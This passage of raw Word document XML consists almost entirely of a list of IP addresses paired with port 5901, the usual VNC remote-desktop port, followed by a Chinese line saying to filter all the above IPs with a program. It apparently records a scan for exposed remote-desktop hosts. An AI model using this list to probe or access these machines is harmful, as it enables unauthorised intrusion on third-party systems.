      <w:r>
        <w:t xml:space="preserve">210.14.134.23:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.51.165.40:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.51.165.41:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.76.97.131:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.76.97.43:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">210.76.97.154:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.76.97.153:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.76.97.74:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.76.97.71:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.76.97.42:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.90.87.223:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.90.87.209:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.90.87.206:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.90.87.208:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.93.1.244:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.97.71.218:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.144.102.99:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.144.219.70:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.152.61.22:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.152.61.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.152.61.31:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.152.61.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.152.61.146:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.152.61.248:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.154.132.143:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.154.142.232:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.156.177.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">211.156.177.9:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.154.166.198:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.156.177.70:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.156.177.94:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.156.177.125:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.154.151.248:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.6.128.83:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.7.38.22:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.17.151.114:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.22.3.203:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.17.55.69:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.24.71.101:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.25.2.24:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.26.109.69:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.28.153.41:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.28.153.37:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.28.242.107:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.56.145.98:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.62.89.135:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.70.87.157:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.75.40.211:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.87.196.5:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">218.77.183.63:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.36.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.115.51:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.119.67:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.118.107:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.119.187:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.121.220:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.122.3:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.123.27:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.127.242:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.127.163:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.127.140:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.94.91.171:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.94.114.187:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.104.144.232:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.94.153.181:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.107.53.44:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.136.240.42:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.140.69.146:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.144.181.26:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.144.181.28:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">219.149.150.11:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.163.123.22:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.200.113.27:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.200.113.24:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.202.103.113:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.248.36.55:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.5.96.195:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.5.97.162:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.6.19.98:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.6.13.154:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.4.211.66:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.6.106.205:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.0.193.41:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.4.211.62:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.7.13.53:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.13.129.161:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.13.79.84:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.13.203.144:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.174.24.116:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.130.120.162:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.130.120.166:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.199.12.252:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">221.199.9.172:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.204.235.146:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.213.43.78:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.213.43.78:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.231.148.84:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.231.148.86:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.232.129.234:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.232.147.101:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.74.129.214:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.34.7.163:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.82.248.98:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.85.179.56:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.85.179.46:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.92.37.93:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.92.37.85:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.92.146.243:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.92.237.66:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.132.155.42:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.161.211.166:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.162.143.100:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.162.143.104:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.162.143.99:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">222.240.194.57:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.83.169.196:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.83.169.180:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.83.169.199:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.83.174.182:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.254.132.22:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">59.41.39.20:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">59.38.32.146:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.18.146.50:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.136.170.6:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.142.83.228:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.136.170.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.183.49.3:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.183.214.5:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.136.170.9:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.233.79.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.233.79.14:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.90.170.89:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.90.170.88:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">112.90.218.68:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">113.57.219.11:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.254.195.109:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">116.254.195.105:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.254.195.110:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.254.195.111:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.254.195.254:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.254.195.103:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.254.195.106:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.254.207.26:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.254.207.121:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.254.253.97:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.254.255.194:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过程序过滤以上所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
